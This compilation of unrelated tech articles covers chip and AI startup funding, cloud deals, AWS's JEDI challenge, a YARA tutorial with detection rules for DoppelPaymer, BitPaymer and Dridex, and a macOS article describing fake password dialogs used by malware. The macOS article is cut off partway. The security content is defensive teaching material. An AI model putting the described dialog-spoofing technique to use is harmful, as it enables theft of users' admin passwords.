Three of Apple and Google’s former star chip designers launch NUVIA with $53M in series A funding

Silicon is apparently the new gold these days, or so VCs hope.

What was once a no-go zone for venture investors, who feared the long development lead times and high technical risk required for new entrants in the semiconductor field, has now turned into one of the hottest investment areas for enterprise and data VCs. Startups like Graphcore have reached unicorn status (after its $200 million series D a year ago) while Groq closed $52M from the likes of Chamath Palihapitiya of Social Capital fame and Cerebras raised $112 million in investment from Benchmark and others while announcing that it had produced the first trillion transistor chip (and who I profiled a bit this summer).

Today, we have another entrant with another great technical team at the helm, this time with a Santa Clara, CA-based startup called NUVIA. The company announced this morning that it has raised a $53 million series A venture round co-led by Capricorn Investment Group, Dell Technologies Capital (DTC), Mayfield, and WRVI Capital, with participation from Nepenthe LLC.

Despite only getting started earlier this year, the company currently has roughly 60 employees, 30 more at various stages of accepted offers, and the company may even crack 100 employees before the end of the year.

What’s happening here is a combination of trends in the compute industry. There has been an explosion in data and by extension, the data centers required to store all of that information, just as we have exponentially expanded our appetite for complex machine learning algorithms to crunch through all of those bits. Unfortunately, the growth in computation power is not keeping pace with our demands as Moore’s Law slows. Companies like Intel are hitting the limits of physics and our current know-how to continue to improve computational densities, opening the ground for new entrants and new approaches to the field.

Finding and building a dream team with a “chip” on their shoulder

There are two halves to the NUVIA story. First is the story of the company’s founders, which include John Bruno, Manu Gulati, and Gerard Williams III, who will be CEO. The three overlapped for a number of years at Apple, where they brought their diverse chip skillsets together to lead a variety of initiatives including Apple’s A-series of chips that power the iPhone and iPad. According to a press statement from the company, the founders have worked on a combined 20 chips across their careers and have received more than 100 patents for their work in silicon.

Gulati joined Apple in 2009 as a micro architect (or SoC architect) after a career at Broadcom, and a few months later, Williams joined the team as well. Gulati explained to me in an interview that, “So my job was kind of putting the chip together; his job was delivering the most important piece of IT that went into it, which is the CPU.” A few years later in around 2012, Bruno was poached from AMD and brought to Apple as well.

Gulati said that when Bruno joined, it was expected he would be a “silicon person” but his role quickly broadened to think more strategically about what the chipset of the iPhone and iPad should deliver to end users. “He really got into this realm of system-level stuff and competitive analysis and how do we stack up against other people and what’s happening in the industry,” he said. “So three very different technical backgrounds, but all three of us are very, very hands-on and, you know, just engineers at heart.”

Gulati would take an opportunity at Google in 2017 aimed broadly around the company’s mobile hardware, and he eventually pulled over Bruno from Apple to join him. The two eventually left Google earlier this year in a report first covered by The Information in May. For his part, Williams stayed at Apple for nearly a decade before leaving earlier this year in March.

The company is being stealthy about exactly what it is working on, which is typical in the silicon space because it can take years to design, manufacture, and get a product into market. That said, what’s interesting is that while the troika of founders all have a background in mobile chipsets, they are indeed focused on the data center broadly conceived (i.e. cloud computing), and specifically reading between the lines, to finding more energy-efficient ways that can combat the rising climate cost of machine learning workflows and computation-intensive processing.

Gulati told me that “for us, energy efficiency is kind of built into the way we think.”

The company’s CMO did tell me that the startup is building “a custom clean sheet designed from the ground up” and isn’t encumbered by legacy designs. In other words, the company is building its own custom core, but leaving its options open on whether it builds on top of ARM’s architecture (which is its intention today) or other architectures in the future.

Building an investor syndicate that’s willing to “chip” in

Outside of the founders, the other half of this NUVIA story is the collective of investors sitting around the table, all of whom not only have deep technical backgrounds, but also deep pockets who can handle the technical risk that comes with new silicon startups.

Capricorn specifically invested out of what it calls its Technology Impact Fund, which focuses on funding startups that use technology to make a positive impact on the world. Its portfolio according to a statement includes Tesla, Planet Labs, and Helion Energy.

Meanwhile, DTC is the venture wing of Dell Technologies and its associated companies, and brings a deep background in enterprise and data centers, particularly from the group’s server business like Dell EMC. Scott Darling, who leads DTC, is joining NUVIA’s board, although the company is not disclosing the board composition at this time. Navin Chaddha, an electrical engineer by training who leads Mayfield, has invested in companies like HashiCorp, Akamai, and SolarCity. Finally, WRVI has a long background in enterprise and semiconductor companies.

I chatted a bit with Darling of DTC about what he saw in this particular team and their vision for the data center. In addition to liking each founder individually, Darling felt the team as a whole was just very strong. “What’s most impressive is that if you look at them collectively, they have a skillset and breadth that’s also stunning,” he said.

He confirmed that the company is broadly working on data center products, but said the company is going to lie low on its specific strategy during product development. “No point in being specific, it just engenders immune reactions from other players so we’re just going to be a little quiet for a while,” he said.

He apologized for “sounding incredibly cryptic” but said that the investment thesis from his perspective for the product was that “the data center market is going to be receptive to technology evolutions that have occurred in places outside of the data center that’s going to allow us to deliver great products to the data center.”

Interpolating that statement a bit with the mobile chip backgrounds of the founders at Google and Apple, it seems evident that the extreme energy-to-performance constraints of mobile might find some use in the data center, particularly given the heightened concerns about power consumption and climate change among data center owners.

DTC has been a frequent investor in next-generation silicon, including joining the series A investment of Graphcore back in 2016. I asked Darling whether the firm was investing aggressively in the space or sort of taking a wait-and-see attitude, and he explained that the firm tries to keep a consistent volume of investments at the silicon level. “My philosophy on that is, it’s kind of an inverted pyramid. No, I’m not gonna do a ton of silicon plays. If you look at it, I’ve got five or six. I think of them as the foundations on which a bunch of other stuff gets built on top,” he explained. He noted that each investment in the space is “expensive” given the work required to design and field a product, and so these investments have to be carefully made with the intention of supporting the companies for the long haul.

That explanation was echoed by Gulati when I asked how he and his co-founders came to closing on this investor syndicate. Given the reputations of the three, they would have had easy access to any VC in the Valley. He said about the final investors:

They understood that putting something together like this is not going to be easy and it’s not for everybody … I think everybody understands that there’s an opportunity here. Actually capitalizing upon it and then building a team and executing on it is not something that just anybody could possibly take on. And similarly, it is not something that every investor could just possibly take on in my opinion. They themselves need to have a vision on their side and not just believe our story. And they need to strategically be willing to help and put in the money and be there for the long haul.

It may be a long haul, but Gulati noted that “on a day-to-day basis, it’s really awesome to have mostly friends you work with.” With perhaps 100 employees by the end of the year and tens of millions of dollars already in the bank, they have their war chest and their army ready to go. Now comes the fun (and hard) part as we learn how the chips fall.

Update: Changed the text to reflect that NUVIA is intending to build on top of ARM’s architecture, but isn’t a licensed ARM core.

Why Salesforce is moving Marketing Cloud to Microsoft Azure

When Salesforce announced this week that it was moving Marketing Cloud to Microsoft Azure, it was easy to see this as another case of wacky enterprise partnerships. But there had to be sound business reasons why the partnership came together, rather than going with AWS or Google Cloud Platform, both of which are also Salesforce partners in other contexts.

If you ask Salesforce, it says it was ultimately because of compatibility with Microsoft SQL.

“Salesforce chose Azure because it is a trusted platform with a global footprint, multi-layered security approach, robust disaster recovery strategy with auto failover, automatic updates and more,” a Salesforce spokesperson told TechCrunch. “Marketing Cloud also has a long standing relationship with Microsoft SQL which makes the transition to SQL on Azure a natural decision.”

Except for the SQL part, Microsoft’s chief rivals at AWS and Google Cloud Platform also provide those benefits. In fact, each of those reasons cited by the spokesperson — with the exception of SQL — are all part of the general cloud infrastructure value proposition that all the major cloud vendors provide.

There’s probably more to it than simply compatibility. There is also a long-standing rivalry between the two companies, and why in spite of their competition, they continue to make deals like this in the spirit of co-opetition. We spoke to a few industry experts to get their take on the deal to find out why these two seeming rivals decided to come together.

Retailer’s dilemma

Tony Byrne, founder and principal analyst at Real Story Group, thinks it could be related to the fact it’s a marketing tool and some customers may be wary about hosting their businesses on AWS while competing with Amazon on the retail side. This is a common argument for why retail customers in particular are more likely to go with Microsoft or Google over AWS.

“Salesforce Marketing Cloud tends to target B2C enterprises, so the choice of Azure makes sense in one context where some B2C firms are wary of Amazon for competitive reasons. But I’d also imagine there’s more to the decision than that,” Byrne said.

YARA Hunting for Code Reuse: DoppelPaymer Ransomware & Dridex Families

The Zero2Hero malware course with Vitali Kremez. Watch now!

The Zero2Hero malware course concludes with Vitali Kremez explaining how to hunt malware families such as DoppelPaymer, BitPaymer & Dridex loader using YARA rules.

image yara hunting

Whenever we discuss how to proactively hunt for malware of interest, whether it be crimeware or APT for threat intelligence purposes, YARA is the true swiss-army knife that makes the work of malware researchers and threat intelligence analysts that much easier. 

Malware developers work just like legitimate software developers, aiming to automate their work and reduce the time wasted on repetitive tasks wherever possible. That means they create and reuse code across their malware. This has a pay-off for malware hunters: we can learn how to create search rules to detect this kind of code reuse, reducing our workload, too! In this post, we will we learn how to write YARA rules for the following three crimeware variants belonging to the Dridex family:

  • 1 – BitPaymer ransomware (known as “wp_encrypt”) part of the Everis extortion case
  • 2 – DoppelPaymer ransomware leveraged in the PEMEX lockdown
  • 3 – Dridex Loader (known as “ldr”) botnet ID “23005” 

image of dopplepaymer

In a nutshell, our goal is to hunt for malware software developer code leveraging YARA code reuse rules rather than relying on rules covering easily changeable strings.

One of the primary original purposes of YARA was to classify and identify malware samples. It is a rather simple Ruby-based language syntax used to describe various patterns.

The latest YARA version is 3.11.0. YARA is a signature-based tool with multiple command-line interfaces in various programming languages. In other words, it is similar to static anti-virus signatures used to detect malicious files.

The major functionality of YARA is to scan folders for files and buffers for patterns. Many tools rely on YARA such as yarashop, for example.

Some of the most common uses of YARA for our purposes is to scan, categorize and identify malware samples of interest based on code and string reuse.

The typical YARA syntax example is as follows:

import <module>

<rule type> rule <rule name> : <tags>
{
    meta:
        <name> = ""
        ...
    strings:
        $<string name> = <value> <modifiers>
        ...
    condition:
        <some condition>
}


Let’s practice writing YARA rules for Zero2Hero:

/*

We practice writing YARA rules for Zero2Hero

*/

import "pe"

rule zero2hero_course : best 
{
    meta:
        // Comment
        description = "This is an example rule to demonstrate typical syntax"
        reference = "https://www.sentinelone.com/lp/zero2hero"
        author = "@VK_Intel"
        tlp = "white"

    strings:
        $hero = "helloworld" xor wide
        $unique_function = { ?? ?? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? }

    condition:
        uint16(0) == 0x5A4D and pe.exports("CryptEncrypt") and  all of them
}

The additional modifiers can be as follows:

    global: match before any subsequent rules 
    private: build other rules 
    none: match unless global is used

The tags are as follows:

    strings: regular expression, text or hex
    string modifiers: wide, ascii, xor, fullword, nocase

The conditions can be as follows:

    Boolean expressions
    Built-in, external, module variables, and functions

YARA String & Code Reuse Hunting 

There is a difference between writing YARA rules for malware hunting versus detection. In this part of the course, we aim to produce “looser” YARA rules for threat hunting purposes with the higher chance of capturing newer variants and false positives. In other contexts, you may want stricter YARA rules for a specific detection mechanism and malware strain.

By and large, efficient YARA rules are only as good as the data sources used to vet the YARA rules against. Anti-virus and malware researchers rely on large datasets of known good and known bad (and known random) samples to produce the most high-fidelity rules as it is often hard to predict YARA rule performance given the limited view of an individual researcher.

Some of the known bad and known good data sources for YARA rules performance include VirusTotal, Hybrid-Analysis, VirusBay, Malpedia, Microsoft, and VirusShare. Florian Roth’s tool yarGen includes some of the necessary string and opcode datasets for YARA performance checks as well. Another excellent tool for YARA rule management is the KLara tool developed by Kaspersky.

One of the major abilities of YARA rules that lead to successful and long-term hits is combining both string-based and code-based coverage. We believe that the key to efficient YARA rules depends on simple and clear rulesets utilizing both. I highly recommend watching Jay Rosenberg’s presentation from Confidence Conference 2019 entitled Utilizing YARA to Find Evolving Malware.

When creating code reuse YARA rules, we need to be aware of compilation flags, different compilers, and slightly altered code that can change the code and break the YARA rules. Consequently, we should wild card ?? certain instances such as used registers, which can change from one sample to another. 

For example, various instructions such as xor eax produce different opcodes depending on the xor’ed register. Skipping opcodes with “[1-2]” from one to two bytes is often necessary to survive compilers and make the YARA rules cover different environments.

The cyclical nature of the YARA rule development can be described in the following 7 steps:

    1. Malware analysis 
    2. Identification of malware string and code “uniqueness”
    3. Prototype the YARA rule based on the findings
    4. Test the YARA prototype rule across diverse malware family and clean and malware data sources
    5. Deploy the rule to hunt for the samples
    6. Review and monitor for possible false positives and/or false negatives outside of the testing phase and initial malware analysis
    7. Repeat

Practical Crimeware Code Reuse: “Dridex” Malware Family

Dridex by far is one of the most complex and sophisticated pieces of malware on the crimeware landscape. 

The malware is also referred to as “Bugat” and “Cridex” by various researchers. The original Bugat malware dates back to 2010, which at some point rivaled the “Zeus” banking malware.

The development group behind it is responsible for the three malware variants, which are the subject of our YARA course:

  • 1 – BitPaymer ransomware (known as “wp_encrypt”) part of the Everis extortion case
  • 2 – DoppelPaymer ransomware leveraged in the PEMEX lockdown
  • 3 – Dridex Loader (known as “ldr”) botnet ID “23005” 

 image of Dridex

The YARA rule for the overarching code reuse across the Dridex developer samples is based on the unique API hashing function used to resolve the Windows API calls. It is one of the most obvious unique features of this family.

The Dridex developer family can be described by this YARA rule as follows based on the API hashing function (as seen on the screenshot above):

rule dridex_family
{
    strings:
        $code = { 5? 5? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? ?? ?? ?? ?? 7? ?? }

    condition:
        $code
}

Always test the rules, for example, via command-line:

yara -s

Testing the YARA rule reveals multiple hits on the Dridex family across the folder.

image of yara hunt

Uniting Code Reuse & String Detection 

I. DoppelPaymer ransomware contains a peculiar string reused across samples we can add to the Dridex family code reuse. It copies the unicode string "setup runn" to eax via lstrcpyW API call.

The possible specific DoppelPaymer ransomware rule is as follows:

 image of yara rule for DoppelPaymer

rule crime_win32_ransomware_doppelpaymer_1
{
    strings:
        $str1 = "Setup runn" wide
        $code = { 5? 5? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? ?? ?? ?? ?? 7? ??}

    condition:
        $code and $str1
}

II. BitPaymer ransomware contains the same referenced string across the samples aimed to act as anti-Windows Defender emulator checking the existence of the file "C:aaa_TouchMeNot_.txt", which is indicative of Windows Defender sandbox activity.

The possible specific BitPaymer ransomware rule is as follows:

image of Bitpaymer

rule crime_win32_ransomware_bitpaymer_1
{
    strings:
        $str1 = "C:aaa_TouchMeNot_.txt" wide
        $code = { 5? 5? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? ?? ?? ?? ?? 7? ??}

    condition:
        $code and $str1
}

III. Across the Dridex loader samples, this malware carries the same string "installed" called via OutputDebugStringW many times acting as anti-emulator. It is indicative of the Dridex loader.

The possible specific Dridex loader rule is as follows:

 image of Dridex Loader

rule crime_win32_loader_dridex_1
{
    strings:
        $str1 = "installed" wide
        $code = { 5? 5? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? ?? ?? ?? ?? 7? ??}
    condition:
        $code and $str1
}


The final YARA rule, for example, covering both code and strings for the DoppelPaymer ransomware unpacked payload is as follows:

rule crime_win32_doppelpaymer_ransomware_1 
{
    meta:
        description = "Detects DoppelPaymer payload Nov 11 Signed"
        author = "@VK_Intel"
        reference = "https://twitter.com/VK_Intel/status/1193937831766429696"
        date = "2019-11-11"
        hash1 = "46254a390027a1708f6951f8af3da13d033dee9a71a4ee75f257087218676dd5"

    strings:
        $s1 = "Setup run" wide
        $hash_function = { 5? 5? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? ?? ?? ?? ?? 7? ??}

    condition:
        ( uint16(0) == 0x5a4d and
            filesize < 2500KB and
            ( all of them )
        )
}

Malware Samples

DoppelPaymer Ransomware (unpacked) SHA-256: 46254a390027a1708f6951f8af3da13d033dee9a71a4ee75f257087218676dd5

BitPaymer Ransomware (unpacked) SHA-256 78e180e5765aa7f4b89d6bcd9bcef1dd1e0d0261ad0f9c3ec6ab0635bf494eb3

Dridex Banker (unpacked) SHA-256 ce509469b80b97e857bcd80efffc448a8d6c63f33374a43e4f04f526278a2c41


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Eigen nabs $37M to help banks and others parse huge documents using natural language and ‘small data’

One of the bigger trends in enterprise software has been the emergence of startups building tools to make the benefits of artificial intelligence technology more accessible to non-tech companies. Today, one that has built a platform to apply the power of machine learning and natural language processing to massive documents of unstructured data has closed a round of funding as it finds strong demand for its approach.

Eigen Technologies, a London-based startup whose machine learning engine helps banks and other businesses that need to extract information and insights from large and complex documents like contracts, is today announcing that it has raised $37 million in funding, a Series B that values the company at around $150 million – $180 million.

The round was led by Lakestar and Dawn Capital, with Temasek and Goldman Sachs Growth Equity (which co-led its Series A) also participating. Eigen has now raised $55 million in total.

Eigen today is working primarily in the financial sector — its offices are smack in the middle of The City, London’s financial center — but the plan is to use the funding to continue expanding the scope of the platform to cover other verticals such as insurance and healthcare, two other big areas that deal in large, wordy documentation that is often inconsistent in how its presented, full of essential fine print, and typically a strain on an organisation’s resources to be handled correctly — and is often a disaster if it is not.

The focus up to now on banks and other financial businesses has had a lot of traction. It says its customer base now includes 25% of the world’s G-SIB institutions (that is, the world’s biggest banks), along with others that work closely with them, like Allen & Overy and Deloitte. Since June 2018 (when it closed its Series A round), Eigen has seen recurring revenues grow sixfold with headcount — mostly data scientists and engineers — double. While Eigen doesn’t disclose specific financials, you can see the growth direction that contributed to the company’s valuation.

The basic idea behind Eigen is that it focuses what co-founder and CEO Lewis Liu describes as “small data.” The company has devised a way to “teach” an AI to read a specific kind of document — say, a loan contract — by looking at a couple of examples and training on these. The whole process is relatively easy to do for a non-technical person: you figure out what you want to look for and analyse, find the examples using basic search in two or three documents and create the template, which can then be used across hundreds or thousands of the same kind of documents (in this case, a loan contract).

Eigen’s work is notable for two reasons. First, typically machine learning and training and AI requires hundreds, thousands, tens of thousands of examples to “teach” a system before it can make decisions that you hope will mimic those of a human. Eigen requires a couple of examples (hence the “small data” approach).

Second, an industry like finance has many pieces of sensitive data (either because it’s personal data, or because it’s proprietary to a company and its business), and so there is an ongoing issue of working with AI companies that want to “anonymise” and ingest that data. Companies simply don’t want to do that. Eigen’s system essentially only works on what a company provides, and that stays with the company.

Eigen was founded in 2014 by Dr. Lewis Z. Liu (CEO) and Jonathan Feuer (a managing partner at CVC Capital Partners, who is the company’s chairman), but its earliest origins go back 15 years earlier, when Liu — a first-generation immigrant who grew up in the U.S. — was working as a “data-entry monkey” (his words) at a tire manufacturing plant in New Jersey, where he lived, ahead of starting university at Harvard.

A natural computing whiz who found himself building his own games when his parents refused to buy him a games console, he figured out that the many pages of printouts he was reading and re-entering into a different computing system could be sped up with a computer program linking up the two. “I put myself out of a job,” he joked.

His educational life epitomises the kind of lateral thinking that often produces the most interesting ideas. Liu went on to Harvard to study not computer science, but physics and art. Doing a double major required working on a thesis that merged the two disciplines together, and Liu built “electrodynamic equations that composed graphical structures on the fly” — basically generating art using algorithms — which he then turned into a “Turing test” to see if people could detect pixelated actual work with that of his program. Distill this, and Liu was still thinking about patterns in analog material that could be re-created using math.

Then came years at McKinsey in London (how he arrived on these shores) during the financial crisis where the results of people either intentionally or mistakenly overlooking crucial text-based data produced stark and catastrophic results. “I would say the problem that we eventually started to solve for at Eigen became tangible,” Liu said.

Then came a physics PhD at Oxford where Liu worked on X-ray lasers that could be used to decrease the complexity and cost of making microchips, cancer treatments and other applications.

While Eigen doesn’t actually use lasers, some of the mathematical equations that Liu came up with for these have also become a part of Eigen’s approach.

“The whole idea [for my PhD] was, ‘how do we make this cheaper and more scalable?,’ ” he said. “We built a new class of X-ray laser apparatus, and we realised the same equations could be used in pattern matching algorithms, specifically around sequential patterns. And out of that, and my existing corporate relationships, that’s how Eigen started.”

Five years on, Eigen has added a lot more into the platform beyond what came from Liu’s original ideas. There are more data scientists and engineers building the engine around the basic idea, and customising it to work with more sectors beyond finance. 

There are a number of AI companies building tools for non-technical business end-users, and one of the areas that comes close to what Eigen is doing is robotic process automation, or RPA. Liu notes that while this is an important area, it’s more about reading forms more readily and providing insights to those. The focus of Eigen is more on unstructured data, and the ability to parse it quickly and securely using just a few samples.

Liu points to companies like IBM (with Watson) as general competitors, while startups like Luminance is another taking a similar approach to Eigen by addressing the issue of parsing unstructured data in a specific sector (in its case, currently, the legal profession).

Stephen Nundy, a partner and the CTO of Lakestar, said that he first came into contact with Eigen when he was at Goldman Sachs, where he was a managing director overseeing technology, and the bank engaged it for work.

“To see what these guys can deliver, it’s to be applauded,” he said. “They’re not just picking out names and addresses. We’re talking deep, semantic understanding. Other vendors are trying to be everything to everybody, but Eigen has found market fit in financial services use cases, and it stands up against the competition. You can see when a winner is breaking away from the pack and it’s a great signal for the future.”

Moveworks snags $75M Series B to resolve help desk tickets with AI

Moveworks, a startup using AI to help resolve help desk tickets in an automated fashion, announced a $75 million Series B investment today.

The round was led by Iconiq Capital, Kleiner Perkins and Sapphire Ventures. Existing investors Lightspeed Venture Partners, Bain Capital Ventures and Comerica Bank also participated. The round also included a personal investment from John W. Thompson, a partner at LightSpeed Venture Partners and chairman at Microsoft. Today’s investment brings the total raised to $105 million, according to the company.

That’s a lot of money for an early-stage company, but CEO and co-founder Bhavin Shah says his company is solving a common problem using AI. “Moveworks is a machine learning platform that uses natural language understanding to take tickets that are submitted by employees every day to their IT teams for stuff they need, and we understand [the content of the tickets], interpret them, and then we take the actions to resolve them [automatically],” Shah explained.

He said the company decided to focus on help desk tickets because they saw data when they were forming the company that suggested a common set of questions, and that would make it easier to interpret and resolve these issues. In fact, they are currently able to resolve 25-40% of all tickets autonomously.

He says this should lead to greater user satisfaction because some of their problems can be resolved immediately, even when IT personnel aren’t around to help. Instead of filing a ticket and waiting for an answer, Moveworks can provide the answer, at least part of the time, without human intervention.

Aditya Agrawal, a partner at Iconiq, says that the company really captured his attention. “Moveworks is not just transforming IT operations, they are building a more modern and enlightened way to work. They’ve built a platform that simplifies and streamlines every interaction between employees and IT, enabling both to focus on what matters,” he said in a statement.

The company was founded in 2016, and in the early days was only resolving 2% of the tickets autonomously, so it has seen major improvement. It already has 115 employees and dozens of customers (although Shah didn’t want to provide an exact number).

Salesforce announces it’s moving Marketing Cloud to Microsoft Azure

In the world of enterprise software, there are often strange bedfellows. Just yesterday, Salesforce announced a significant partnership with AWS around the Cloud Information Model. This morning, it announced it was moving its Marketing Cloud to Microsoft Azure. That’s the way that enterprise partnerships shimmy and shake sometimes.

The companies also announced they were partnering around Microsoft Teams, integrating Teams with Salesforce Sales Cloud and Service Cloud.

Salesforce plans to move Marketing Cloud, which has been running in its own data centers, to Microsoft Azure in the coming months, although the exact migration plan timeline is not clear yet. This is a big deal for Microsoft, which competes fiercely with AWS for customers. AWS is the clear market leader in the space, but Microsoft has been a strong second for some time now, and bringing Salesforce on board as a customer is certainly a quality reference for the company.

Brent Leary, founder at CRM Essentials, who has been watching the market for many years, says the partnership says a lot about Microsoft’s approach to business today, and that it’s willing to partner broadly to achieve its goals. “I think the bigger news is that Salesforce chose to go deeper with Microsoft over Amazon, and that Microsoft doesn’t fear strengthening Salesforce at the potential expense of Dynamics 365 (its CRM tool), mainly because their biggest growth driver is Azure,” Leary told TechCrunch.

Microsoft and Salesforce have always had a complex relationship. In the Steve Ballmer era, they traded dueling lawsuits over their CRM products. Later, Satya Nadella kindled a friendship of sorts by appearing at Dreamforce in 2015. The relationship has ebbed and flowed since, but with this announcement, it appears the frenemies are closer to friends than enemies again.

Let’s not forget though, that it was just yesterday that Salesforce announced a partnership with AWS around the Cloud Information Model, one that competes directly with a different partnership between Adobe, Microsoft and SAP; or that just last year Salesforce announced a significant partnership with AWS around data integration.

These kinds of conflicting deals are confusing, but they show that in today’s connected cloud world, companies that will compete hard with one another in one part of the market may still be willing to partner in other parts when it makes sense for both parties and for customers. That appears to be the case with today’s announcement from these companies.

Adobe announces GA of customer data platform

The customer data platform (CDP) is the newest tool in the customer experience arsenal as big companies try to help customers deal with data coming from multiple channels. Today, Adobe announced the general availability of its CDP.

The CDP is like a central data warehouse for all the information you have on a single customer. This crosses channels like web, email, text, chat and brick and mortar in-person visits, as well as systems like CRM, e-commerce and point of sale. The idea is to pull all of this data together into a single record to help companies have a deep understanding of the customer at an extremely detailed level. They then hope to leverage that information to deliver highly customized cross-channel experiences.

The idea is to take all of this information and give marketers the tools they need to take advantage of it. “We want to make sure we create an offering that marketers can leverage and makes use of all of that goodness that’s living within Adobe Experience platform,” Nina Caruso, product marketing manager for Adobe Audience Manager, explained.

She said that would involve packaging and presenting the data in such a way to make it easier for marketers to consume, such as dashboards to deliver the data they want to see, while taking advantage of artificial intelligence and machine learning under the hood to help them find the data to populate the dashboards without having to do the heavy lifting.

Beyond that, having access to real-time streaming data in one place under the umbrella of the Adobe Experience Platform should enable marketers to create much more precise market segments. “Part of real-time CDP will be building productized primo maintained integrations for marketers to be able to leverage, so that they can take segmentations and audiences that they’ve built into campaigns and use those across different channels to provide a consistent customer experience across that journey life cycle,” Caruso said.

As you can imagine, bringing all of this information together, while providing a platform for customization for the customer, raises all kinds of security and privacy red flags at the same time. This is especially true in light of GDPR and the upcoming California privacy law. Companies need to be able to enforce data usage rules across the platform.

To that end, the company also announced the availability of Adobe Experience Platform Data Governance, which helps companies define a set of rules around the data usage. This involves “frameworks that help [customers] enforce data usage policies and facilitate the proper use of their data to comply with regulations, obligations and restrictions associated with various data sets,” according to the company.

“We want to make sure that we offer our customers the controls in place to make sure that they have the ability to appropriately govern their data, especially within the evolving landscape that we’re all living in when it comes to privacy and different policies,” Caruso said.

These tools are now available to Adobe customers.

AWS confirms reports it will challenge JEDI contract award to Microsoft

Surely just about everyone was surprised when the Department of Defense last month named Microsoft as the winner of the decade-long, $10 billion JEDI cloud contract — none more so than Amazon, the company everyone assumed all along would be the winner. Today the company confirmed earlier reports that it was challenging the contract award in the Court of Federal Claims.

The Federal Times broke this story.

In a statement, an Amazon spokesperson suggested that there was possible bias and issues in the selection process. “AWS is uniquely experienced and qualified to provide the critical technology the U.S. military needs, and remains committed to supporting the DoD’s modernization efforts. We also believe it’s critical for our country that the government and its elected leaders administer procurements objectively and in a manner that is free from political influence.

“Numerous aspects of the JEDI evaluation process contained clear deficiencies, errors, and unmistakable bias — and it’s important that these matters be examined and rectified,” an Amazon spokesperson told TechCrunch.

It’s certainly worth noting that the president has not hidden his disdain for Amazon CEO and founder Jeff Bezos, who also is owner of The Washington Post newspaper. As I wrote in Even after Microsoft wins, JEDI saga could drag on:

Amazon, for instance, could point to Jim Mattis’ book where he wrote that the president told the then Defense Secretary to “screw Bezos out of that $10 billion contract.” Mattis says he refused, saying he would go by the book, but it certainly leaves the door open to a conflict question.

Oracle also filed a number of protests throughout the process, including one with the Government Accountability Office that was later rejected. It also went to court and the case was dismissed. All of the protests claimed that the process favored Amazon. The end result proved it didn’t.

The president interjected himself in the decision process in August, asking the defense secretary, Mark T. Esper, to investigate once again if the procurement process somehow favored Amazon, and the week the contract was awarded, the White House canceled its subscription to The Washington Post.

In October, the decision finally came and the DOD chose Microsoft . Now Amazon is filing a challenge in federal Court, and the JEDI saga really ain’t over until it’s over.

 

Privilege Escalation | macOS Malware & The Path to Root Part 2

Among security researchers and bug bounty hunters, obtaining unauthorized elevated privileges – privilege escalation – is widely held as the hackers holy grail; an achievement that can be paved with gold as bounty programs, private zero day hoarders and pwn2own-style competitions reward such exploits with handsome amounts of hard cash. As we saw in Part I, Apple’s regular product security updates are frequently littered with a variety of arbitrary code execution and privilege escalation vulnerabilities found by researchers both public and private. Despite this, the vulnerabilities and exploits discovered by researchers are not widely used in the wild by macOS threat actors, and that is largely because they have found other ways to the same end. In this post, we continue our look at the role of privilege escalation on macOS from the point of view of malware developers and how they take a different path.

image privilege escalation part 2

Where’s the Harm in Asking?

Much of the commodity malware and adware seen on macOS doesn’t avail itself of the kind of exploits that lead to privilege escalation that we looked at last time. That’s not only because the exploits typically have a limited shelf life. It’s also not time well-spent. Most users, incredibly but not surprisingly, will happily give elevated privileges if you only ask! 

This direct route to elevation is party engendered by the fact that Mac users are conditioned by both frequency and repetition to seeing authorization requests when they install or move applications, move or copy files or programs from one location to another outside of their home folders, and now – more than ever – to grant applications access rights to many common system services such as Contacts, Calendars, Photos and such like, something we’ll discuss below in detail.

Examples of “ask and hope” are easy to find among macOS commodity adware and malware; in fact, they are the norm, precisely because users are easily socially engineered into installing some program or opening some file that they believe is going to be useful, informative or otherwise beneficial to what they are currently doing. 

Malware developers, PUPs/PUAs and adware make regular use of the built in Installer.app and .pkg file format, just like legitimate apps. They know that most users will click through the installer wizard and never stop to check the installer.log to see what is really going on, let alone use a tool like Suspicious Package to inspect what the package contains.

image of suspicious package

Below is just one example of a common malicious installer.

image of PUP ADWARE installer
image of installer log

Genuine uses of the API that requests elevated permissions do not expose the password to the calling process, but malware authors typically just fake the dialog box and capture the password in plain text, which is easy to do.

image fake installer dialog box

It’s also fairly simple to use a bit of AppleScript to spoof a user into supplying a password with a pretty genuine-looking dialog box that even imports legitimate native icons for added authenticity:

image spoof password
image of spoof script

And sometimes, even asking for root isn’t required. Famously, in the initial public release of macOS 10.13 High Sierra, an error allowed anyone to unlock a protected System Preferences pane simply with the username root and an empty password (the flaw was fixed in macOS 10.13.1)!

Abusing Dialog Alerts – Can Click, Will Click

Legitimate requests for privileges or access to protected resources have always been highly uninformative, conditioning users to either take on trust that the process is benign or risk losing some desired functionality. 

Aware of this, Apple have recently made changes to Security & Privacy preferences, adding the requirement that for notarized apps, developers must provide an informative description to be displayed in the request dialog if they intend to access these protected resources.

While the intention is good, it’s unlikely that this extra “hoop” for legitimate developers to jump through will make any difference to malware authors. First, there’s no check on what information the developer provides, only that they provide some kind of description string. Second, even Apple’s own description strings are hardly any less confusing. For example, what could it possibly mean to most users to say one application will be able to access documents and data in Terminal.app? The Terminal app isn’t typically thought of as a location for storing documents and data, so that description is at best confusing to users. Likely, we suspect it means one app will have access to documents and data within the sandbox container of the other app, but even if correct that is hardly helpful. What the implications are of that are left entirely for the user to find out the hard way: by clicking one of the buttons and finding out.

image of terminal app dialog

The result of that is the requirement to provide a description string isn’t really likely to be that helpful in judging whether it’s an action the user wants to take or not. Thirdly, and perhaps anecdotally, most people agree that such messages even when presented with useful text are rarely even read before the click or button press has been made. Double that effect when the messages come thick and fast and are perceived as a hindrance to productivity.

Who Needs Sudo When The User is Admin?

Another reason why attackers on macOS don’t worry unduly about elevating privileges to root is that by far and away the majority of macOS users are running as the default user that was setup when they first bought or were given their Mac. That default user is, of course, an admin user. The id command will quickly tell a process what access its user has.

image of id utility

